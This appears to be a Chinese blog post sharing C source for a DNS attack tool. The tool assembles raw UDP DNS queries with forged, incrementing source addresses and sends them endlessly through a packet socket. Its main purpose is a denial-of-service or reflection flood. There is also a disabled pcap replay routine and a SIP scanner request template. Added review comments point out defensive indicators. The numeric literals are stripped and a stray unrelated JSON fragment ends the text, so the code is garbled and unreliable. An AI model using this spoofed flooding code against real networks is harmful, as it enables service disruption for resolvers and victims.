dns攻击包代码实现
博客地址:http://home.cnblogs.com/u/zengjianrong/
代码没有做好精简,有些多余的没有删去,因为博主太懒了哈哈
#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/time.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <sys/ioctl.h> #define WORD unsigned short
/*
 * Hand-written wire-format headers used to assemble raw Ethernet/IPv4/UDP/DNS
 * frames byte by byte. No packing attribute is visible on any of them.
 * NOTE(review): this copy of the listing has lost its numeric literals during
 * extraction (see `int socketid = -;` at the end of this section), so it does
 * not compile as shown.
 */
#define DWORD unsigned long typedef struct ip_hdr
{
unsigned char ip_verlen; // IP version & length
unsigned char ip_tos; // IP type of service
unsigned short ip_totallength; // Total length
unsigned short ip_id; // Unique identifier
unsigned short ip_offset; // Fragment offset field
unsigned char ip_ttl; // Time to live
unsigned char ip_protocol; // Protocol(TCP, UDP, etc.)
unsigned short ip_checksum; // IP checksum
unsigned int ip_srcaddr; // Source address
unsigned int ip_destaddr;
}IP_HDR;
/* TCP header layout; only used for an unused local in makerawpacket() in the visible code. */
typedef struct tcp_hdr
{
unsigned short sport;
unsigned short dport;
unsigned int seqnum;
unsigned int acknum;
unsigned char DataOffset;
unsigned char Flags;
unsigned short Windows;
unsigned short Checksum;
unsigned short UrgPointer;
}TCP_HDR; typedef struct udp_head
{
unsigned short sport;
unsigned short dport;
unsigned short len;
unsigned short Checksum;
}UDP_HDR; typedef struct ps_hdr
{
/* Pseudo-header that is prepended to the UDP header when its checksum is computed. */
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
}PS_HDR; typedef struct {
unsigned short id; // identifier; lets the client match DNS responses to requests
unsigned short flags; // flags: (query) 0x0100, (response) 0x8180; these values are in host byte order
unsigned short questions; // number of questions
unsigned short answers; // number of answer resource records
unsigned short author; // number of authority resource records
unsigned short addition; // number of additional resource records
/* socketid (declared on the next line) is the process-wide packet socket: set in main(), used by the send routines. */
}DNS_HDR; #define MAX_BUF_LEN 30*1024*1024 int socketid = -;
/*
 * Ones'-complement sum over `size` bytes of `buffer`, folded and inverted;
 * the callers below use it for the IP header checksum and the UDP checksum.
 * A trailing odd byte is added by the `if (size)` branch.
 * NOTE(review): the initial value, the loop bound and the shift counts are
 * missing in this copy of the listing, so the function is incomplete as shown.
 */
unsigned short checksum(unsigned short *buffer, int size)
{
unsigned long cksum=;
while (size > )
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size)
{
cksum += *(unsigned char*)buffer;
}
cksum = (cksum>>)+(cksum&0xffff);
cksum += (cksum>>);
return (unsigned short)(~cksum);
} void makerawpacket(unsigned char *buffer, int len, unsigned char *ucSIp, unsigned char *ucDIp, unsigned int k)
/*
 * makerawpacket: rewrites the IP and UDP headers of a frame that the caller
 * has already assembled in `buffer`.
 * The source address comes from the caller-supplied string `ucSIp`, offset by
 * htonl(k); it is never derived from the sending host's own address, so each
 * frame leaves with a forged source. The UDP checksum is recomputed over a
 * pseudo-header (protocol 0x11 = UDP), the UDP header and `len` payload bytes.
 * Defensive relevance: traffic built this way is what source-address
 * validation at the network edge (BCP 38 ingress/egress filtering, uRPF) is
 * designed to drop before it reaches a resolver.
 * NOTE(review): `len` is copied into tcpCheckBuf with no visible bound check;
 * the array size and the buffer offsets are missing in this copy.
 * tcp_header and dns_header are declared but not used in the visible body.
 */
{
IP_HDR ipheader;
TCP_HDR tcp_header;
UDP_HDR udp_header;
DNS_HDR dns_header;
unsigned long dwFromIP = inet_addr(ucSIp);
unsigned long dwToIP = inet_addr(ucDIp); dwFromIP += htonl(k);
char tcpCheckBuf[];
PS_HDR pseudo_header; memcpy(&ipheader,buffer+,sizeof(IP_HDR));
ipheader.ip_srcaddr=(dwFromIP);
ipheader.ip_destaddr=dwToIP;
ipheader.ip_checksum = 0xffff;
ipheader.ip_checksum=checksum((unsigned short *)&ipheader,);
memcpy(&udp_header,buffer++sizeof(IP_HDR),sizeof(UDP_HDR));
udp_header.Checksum= 0xffff; pseudo_header.source_address =ipheader.ip_srcaddr ;
pseudo_header.dest_address =ipheader.ip_destaddr ;
pseudo_header.placeholder = ;
pseudo_header.protocol = 0x11;
pseudo_header.tcp_length = htons(sizeof(udp_header)+len);
memcpy(tcpCheckBuf,&pseudo_header,sizeof(pseudo_header));
memcpy(tcpCheckBuf+sizeof(pseudo_header),&udp_header,sizeof(udp_header));
memcpy(tcpCheckBuf+sizeof(pseudo_header)+sizeof(udp_header),buffer++sizeof(ipheader)+sizeof(udp_header),len);
udp_header.Checksum = checksum((unsigned short*)(tcpCheckBuf),sizeof(pseudo_header)+sizeof(udp_header)+len);
/* Write the patched headers back over the ones in the caller's frame. */
memcpy(buffer+,&ipheader,sizeof(ipheader));
memcpy(buffer++sizeof(ipheader),&udp_header,sizeof(udp_header));
} #if 0 /* Modified by zengjianrong on 2014-12-15, 14:00 */
/*
 * Disabled (#if 0) earlier variant. From the visible code: on the first call
 * it reads up to MAX_BUF_LEN bytes of the file into a heap buffer and closes
 * the file; it then scans that buffer for a byte sequence matching MacBuf,
 * copies the IP header, UDP header and payload that follow each match into
 * sendBuf, passes the frame to makerawpacket() and sends it on "eth2".
 * The #else arm holds a SIP REGISTER template string that no visible code
 * references; its User-Agent value, friendly-scanner, is a string widely
 * reported in SIP scanning traffic and commonly matched by detection rules.
 * NOTE(review): compiled out; array indices, sizes and call arguments are
 * missing in this copy. sendlen comes from the capture's UDP length field and
 * is used as a memcpy size with no visible bound check.
 */
int nSendAttackPacketFromPcap(FILE *fp)
{
int nGetLen = ;
static int RetLen = ;
int CheckIndex = ;
static unsigned char *readbuf;
int i;
unsigned char MacBuf[] = {/*main mac*/0x00 ,0x21 ,0xf2 ,0x00 ,0x00 ,0x06,/*extend mac*/0x78 ,0x8c ,0x54 ,0x33 ,0xbb ,0x7b,0x08,0x00};
IP_HDR iphead;
UDP_HDR udphead;
unsigned char sendBuf[];
int sendlen = ;
struct sockaddr addr;
int nPacket = ;
unsigned char RealMacBuf[] = {/*main mac*/0x00,0x21,0xF2,0x00,0x0A,0x29,/*extend mac*/0x00,0x0C,0x29,0x66,0xB0,0x45,0x08,0x00};
static int firstcall = ; #if 1 /*Modified by kcr, 2014-11-24*/
if (==firstcall)
{
printf("nSendAttackPacketFromPcap first call\n");
readbuf = malloc(MAX_BUF_LEN);
if (NULL==readbuf)
return -;
RetLen = fread(readbuf,,MAX_BUF_LEN,fp);
printf("read %d\n",RetLen);
fclose(fp);
}
firstcall = ; memcpy(sendBuf,RealMacBuf,);
CheckIndex = ;
while(CheckIndex<(RetLen-))
{
/*printf("%02x ",readbuf[CheckIndex]);*/ /*Modified by kcr,2014-11-13*/
/* Byte-by-byte comparison against MacBuf; any mismatch advances and restarts the scan. */
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
nPacket++;
/*MAC match*/
memset(&iphead,,sizeof(IP_HDR));
memset(&udphead,,sizeof(UDP_HDR));
memcpy(&iphead,&readbuf[CheckIndex],sizeof(IP_HDR));
CheckIndex += sizeof(IP_HDR);
memcpy(&udphead,&readbuf[CheckIndex],sizeof(UDP_HDR));
CheckIndex += sizeof(UDP_HDR); udphead.sport = htons();
memcpy(sendBuf,RealMacBuf,);
memcpy(sendBuf+,&iphead,sizeof(IP_HDR));
memcpy(sendBuf++sizeof(IP_HDR),&udphead,sizeof(UDP_HDR));
sendlen = ntohs(udphead.len)-;
memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR),&readbuf[CheckIndex],sendlen);
CheckIndex += sendlen;
makerawpacket(sendBuf,sendlen, , , );
memset(&addr, , sizeof(addr));
strcpy(addr.sa_data, "eth2");
if (sendto(socketid, sendBuf, +sizeof(IP_HDR)+sizeof(UDP_HDR)+sendlen, , &addr, sizeof(addr)) < )
{
}
usleep();
}
return nGetLen;
#else "REGISTER sip:61.144.88.146 SIP/2.0\r\n\
Via: SIP/2.0/UDP 5.196.76.190:;branch=z9hG4bK-;rport\r\n\
Content-Length: \r\n\
From: \"7608\" <sip:7608@61.144.88.146>;tag=%10d\r\n\
Accept: application/sdp\r\n\
User-Agent: friendly-scanner\r\n\
To: \"7608\" <sip:7608@61.144.88.146>\r\n\
Contact: sip:@1.1.1.1\r\n\
CSeq: REGISTER\r\n\
Call-ID: %10d\r\n\
Max-Forwards: \r\n\r\n" #endif /*End of Modified by kcr*/ /*free(readbuf);*/ /*Modified by kcr,2014-10-16*/
}
#endif /* #if 0, End of Modified by zengjianrong on 2014-12-15, 14:00 */ int vp_CreatTask(void (*funcptr)(),void *argv)
/*
 * vp_CreatTask: starts funcptr(argv) on a new pthread with an explicitly set
 * stack size and returns the result of pthread_create(). The scheduling
 * policy/priority setup is compiled out (#if 0).
 * NOTE(review): the thread id is written through a cast of `int tid`;
 * pthread_t may be wider than int on some platforms - confirm. The results of
 * the two pthread_attr_* calls are overwritten without being checked, and
 * sched_policy, prv_priority and error are unused in the compiled path.
 */
{
pthread_attr_t attr;
int ret;
size_t stacksize = ;
int tid;
struct sched_param prv_priority;
int sched_policy;
int error; memset(&attr,,sizeof(pthread_attr_t));
ret=pthread_attr_init(&attr); stacksize = /*PTHREAD_STACK_MIN*3*/*;
ret = pthread_attr_setstacksize(&attr, stacksize); #if 0 /*Modified by kcr, 2014-03-12*/
pthread_attr_getschedparam( &attr, &prv_priority); sched_policy = SCHED_FIFO;
pthread_attr_setschedpolicy( &attr, sched_policy ); prv_priority.sched_priority = ;
pthread_attr_setschedparam( &attr, &prv_priority);
#endif /*End of Modified by kcr*/ ret = pthread_create((pthread_t *)&tid,&attr,(void *)funcptr, argv); return ret;
} int nSendAttackPacket(unsigned char *ucSIp, unsigned char *ucDIp, unsigned char *RealMacBuf, unsigned int unMaxCnt)
/*
 * nSendAttackPacket: assembles one Ethernet + IPv4 + UDP + DNS query frame in
 * sendBuf and sends it in a loop on the packet socket `socketid` via "eth1".
 * makerawpacket() is called with an incrementing `k` before every send, so
 * the source address differs from frame to frame. `unMaxCnt` only sets the
 * length of the busy-wait between sends. sendto() failures are ignored (the
 * if-body is empty).
 *
 * Constant fields visible here that a detection rule can key on:
 *   - IP identification 0x9045 and DNS transaction id 0xd2ce never change;
 *   - UDP destination port 0x35 (53), DNS flags 0x0100 (standard query);
 *   - the question bytes encode the name "leaseweb.com", type 0x0001 (A),
 *     class 0x0001 (IN), followed by an 11-byte additional record of type
 *     0x0029 (EDNS0 OPT) whose class field is 0x2328.
 * A run of otherwise identical queries from consecutive source addresses is
 * itself a strong indicator of forged sources.
 * NOTE(review): buffer sizes, offsets and several field values are missing in
 * this copy. nGetLen, CheckIndex, nPacket and unCnt_2 are unused here.
 */
{
int nGetLen = ;
int CheckIndex = ;
unsigned int k;
IP_HDR iphead;
UDP_HDR udphead;
DNS_HDR dns_header;
unsigned char dnsQueries[]={
/*08 6c 65 61 73 65 77 65
62 03 63 6f 6d 00 00 01
00 01*/
0x08, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x77, 0x65,
0x62, 0x03, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x01,
0x00, 0x01,
0x00, 0x00, 0x29, 0x23, 0x28, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00};
unsigned char sendBuf[];
int sendlen = ;
struct sockaddr addr;
int nPacket = ;
unsigned int unCnt = ;
unsigned int unCnt_2 = ;
memcpy(sendBuf,RealMacBuf,); memset(&iphead,,sizeof(IP_HDR));
iphead.ip_verlen = 0x45;
iphead.ip_tos = ;
iphead.ip_totallength = htons(0x45);
iphead.ip_id = htons(0x9045);
iphead.ip_offset = ;
iphead.ip_ttl = ;
iphead.ip_protocol = ; /* udp */ memset(&udphead,,sizeof(UDP_HDR));
udphead.sport = htons();
udphead.dport = htons(0x35); /* dns */
udphead.len = htons(0x31);
udphead.Checksum = 0x0; memset(&dns_header, , sizeof(DNS_HDR));
dns_header.id = htons(0xd2ce);
dns_header.flags = htons(0x0100); // flags: (query) 0x0100, (response) 0x8180; these values are in host byte order
dns_header.questions = htons(); // number of questions
dns_header.answers = ; // number of answer resource records
dns_header.author = ; // number of authority resource records
dns_header.addition = htons(); memcpy(sendBuf,RealMacBuf,);
memcpy(sendBuf+,&iphead,sizeof(IP_HDR));
memcpy(sendBuf++sizeof(IP_HDR),&udphead,sizeof(UDP_HDR));
memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR), &dns_header, sizeof(dns_header)); memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header),
&dnsQueries, sizeof(dnsQueries)); memset(&addr, , sizeof(addr));
strcpy(addr.sa_data, "eth1");
k=;
//printf("func:%s,line:%d, delay Cnt=0x%x\n", __FUNCTION__, __LINE__, unMaxCnt);
while ()
{
makerawpacket(sendBuf,sizeof(dns_header)+, ucSIp, ucDIp, k);
k++;
if (sendto(socketid, sendBuf, +sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header)+, , &addr, sizeof(addr)) < )
{
}
//usleep(20); #if 1 /* Modified by zengjianrong on 2014-12-12, 17:00 */
/* Busy-wait used as the inter-packet delay; it spins the CPU instead of sleeping. */
unCnt = ;
while(unMaxCnt > unCnt)
{
unCnt ++;
}
#endif /* #if 0, End of Modified by zengjianrong on 2014-12-12, 17:00 */
} return ;
/*free(readbuf);*/ /*Modified by kcr,2014-10-16*/
} void RecvRespond(void)
/*
 * RecvRespond: thread body that binds a UDP socket on INADDR_ANY and loops on
 * select()/recvfrom(), discarding whatever arrives; nothing is parsed, logged
 * or handed to another function in the visible code.
 * NOTE(review): the results of socket() and bind() are not checked,
 * RemoteAddrLen is an int rather than socklen_t, and the port, buffer size and
 * timeout values are missing in this copy.
 */
{
int socket_fd;
unsigned char Buf[];
struct sockaddr_in LocalAddr;
struct sockaddr_in RemoteAddr;
fd_set recset;
struct timeval wait;
int nBytes;
int RemoteAddrLen =sizeof(struct sockaddr_in); socket_fd = socket(AF_INET, SOCK_DGRAM, );
memset(&LocalAddr, , sizeof(struct sockaddr_in));
LocalAddr.sin_family = AF_INET;
LocalAddr.sin_addr.s_addr = htonl(INADDR_ANY);
LocalAddr.sin_port = htons(); bind(socket_fd, (struct sockaddr *)&(LocalAddr), sizeof(struct sockaddr)); while()
{
memset(&recset, , sizeof(fd_set));
FD_SET(socket_fd, &recset); memset(&RemoteAddr, , sizeof(struct sockaddr_in)); wait.tv_sec = ;
wait.tv_usec = ;
nBytes = select(FD_SETSIZE, &recset, , , &wait);
if(nBytes>)
{
nBytes = recvfrom(socket_fd,Buf,,, (struct sockaddr *)&RemoteAddr,&RemoteAddrLen);
}
}
} void str2mac(unsigned char *ucInput, unsigned char *ucOutput)
/*
 * str2mac: parses a colon-separated hex string from ucInput into bytes at
 * ucOutput, storing one byte at each ':' and at the terminating NUL.
 * `k` tracks whether the current character is the first digit of a byte.
 * NOTE(review): any character outside the digit range is treated as a
 * lowercase hex letter with no validation, and the visible code places no
 * bound on the number of bytes written to ucOutput. The character and shift
 * constants are missing in this copy.
 */
{
unsigned char ucTemp = ;
int i = , j = , k = ;
do
{
//printf("func:%s,line:%d,0x%x. \n", __FUNCTION__, __LINE__, ucInput[i]);
if ((':' == ucInput[i]) || ('\0' == ucInput[i]))
{
ucOutput[j] = ucTemp;
j ++;
k = ;
}
else
{
if ( == k)
{
if (ucInput[i]>='' && ucInput[i] <= '')
ucTemp = ucInput[i] - '';
else
ucTemp = ucInput[i] - 'a' + ;
}
else
{
if (ucInput[i]>='' && ucInput[i] <= '')
ucTemp = (ucTemp<<) | (ucInput[i] - '');
else
ucTemp = (ucTemp<<) | (ucInput[i] - 'a' + );
}
k = ;
}
}while ('\0' != ucInput[i++]); } /*
Delay = 100000000: roughly 4,
Delay = 10000000: roughly 40,
Delay = 1000000: roughly 360,
Delay = 100000: roughly 2930,
Delay = 10000: roughly 6500,
Delay = 0: more than 50,000
(counts as given by the author; the unit and measurement interval are not stated on the page)
*/
/*
 * Entry point. Per the usage string the arguments are: sip smac dip dmac delay.
 * Visible flow: fill RealMacBuf from two MAC-address arguments via str2mac()
 * and append the bytes 0x08 0x00 (IPv4 EtherType), open a PF_PACKET /
 * SOCK_PACKET socket for protocol 0x800, enable SO_BROADCAST, start
 * RecvRespond() on a thread, then call nSendAttackPacket() in an endless loop
 * with the delay argument parsed by strtoul().
 *
 * Defensive relevance: on Linux a packet socket requires CAP_NET_RAW
 * (typically root), so packet-socket creation by an unexpected process is a
 * useful host-side signal; SOCK_PACKET is documented as obsolete in packet(7).
 * Because the frames carry caller-chosen source IP addresses, source-address
 * validation on the access network is the control that stops them leaving.
 *
 * NOTE(review): argv is declared as `void *argv[]` rather than `char *argv[]`;
 * the argc threshold, argv indices, buffer size and return codes are missing
 * in this copy; the strtoul() result and vp_CreatTask() result are unchecked.
 */
int main(int argc,void *argv[])
{
int optval = ;
unsigned char RealMacBuf[];
#if 0 /* Modified by zengjianrong on 2014-12-02, 15:00 */
FILE *fp; if(argc<)
return ; printf("open file %s\n",argv[]);
fp = fopen(argv[],"rb+");
if(NULL==fp)
{
printf("Can't open file %s\n",argv[]);
return ;
}
#endif /* #if 0, End of Modified by zengjianrong on 2014-12-02, 15:00 */
if ( > argc)
{
printf("eg.: ./attack sip smac dip dmac delay\n");
return -;
}
memset(RealMacBuf, , ); str2mac(argv[], &(RealMacBuf[]));
str2mac(argv[], RealMacBuf);
RealMacBuf[] = 0x08;
RealMacBuf[] = 0x00; printf("create socket\n");
if ((socketid = socket (PF_PACKET, SOCK_PACKET, htons(0x800))) == -) {
return -;
}
printf("set SO_BROADCAST\n");
if (setsockopt(socketid, SOL_SOCKET, SO_BROADCAST, &optval, sizeof(optval)) == -) {
close(socketid);
return -;
} vp_CreatTask(RecvRespond,);
/* nSendAttackPacket() loops internally, so this outer loop only matters if it ever returns. */
while()
{
nSendAttackPacket(argv[], argv[], RealMacBuf, strtoul(argv[], NULL, ));
/*printf("loop back\n");*/ /*Modified by kcr,2014-11-24*/
//usleep(100000); /*Modified by kcr,2014-11-13*/
}
}
", "price": 12.0, "orderDate": "2019-07-05 10:40:00", "order ...